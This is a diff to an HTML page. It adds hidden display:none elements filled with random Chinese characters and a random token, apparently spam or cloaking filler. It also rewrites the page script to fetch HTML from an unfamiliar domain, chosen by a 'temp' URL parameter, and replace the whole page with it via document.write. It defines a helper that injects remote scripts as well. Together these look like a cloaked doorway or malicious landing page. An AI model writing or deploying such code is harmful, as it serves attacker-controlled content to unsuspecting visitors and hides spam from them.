--- a/index.html
+++ b/index.html
@@ -1,6 +1,14 @@
+        <!DOCTYPE html>
 <html>
 <head> <meta charset="utf-8" /></head>
-<body></body>
+<body> 
+<a  href='#' style='display:none'>kRWKUEHp60EGzjy7yhmmSf9lAhwVteI</a>
+<li style='display:none' >副躬伺垦侥澜匆趁崇局恋岭报缆蓬末唉岭焕唇敬淑钩炽瞬怪泰宛镐峡集渴论秸投石缔恭沙蛇缅辨杀新落羡安霜磷粮痞靶龋掸场</li>
+<li style='display:none' >副躬伺垦侥澜匆趁崇局恋岭报缆蓬末唉岭焕唇敬淑钩炽瞬怪泰宛镐峡集渴论秸投石缔恭沙蛇缅辨杀新落羡安霜磷粮痞靶龋掸场</li>
+<ul style='display:none' >换连炮鼓哩差蔡嗅禄锻爽镀粉拜剖拳投便词锻瑰脊括化叔孟纪梢</ul>
+<div style='display:none'>且冕描抠鼓刊缔匆典申惰钾握鄙舵伐捻什扮芯疼握涣肮呕奸南年措粒申脊蟹惕瓶戈混权奉僻烂怀攘艾谢舌纠桔蓖荣蛾刃屎侍床匣刚姬杏佳太接窃沫倡副篡睡潮斯剂胖屡涪无琴缚倪抠李舜豌蝗佃闭导遁乖骆浩寄郊仍巩袖册诚饺覆逗</div>
+<ul style='display:none' >换连炮鼓哩差蔡嗅禄锻爽镀粉拜剖拳投便词锻瑰脊括化叔孟纪梢</ul>
+<b style='display:none' >荣第慈婪枢挟链表寇倒权醒裴嚏俊唯绕欺杠顾玻竭摊炬撬剖翔普报熄倒擅护且料邢仍通玲病茫褪惧顶狮屡去绩想吵赫诧凹购盼坤豆</b></body>
 <script>
     function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
     function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
@@ -17,9 +25,10 @@
             n.send(null)
     }
     var temp = getUrlParam('temp');
+    
     //if(document.referrer){
     var temp_name = temp +'.html';
-    Dget('https://hbb2.oss-cn-beijing.aliyuncs.com/jb/'+temp_name+'?n='+new Date().getTime(),function(res){
+    Dget('https://b.hg471r.cn/jb/'+temp_name,function(res){
         var doc=document.open("text/html","replace")
         doc.write(res);
         doc.close()
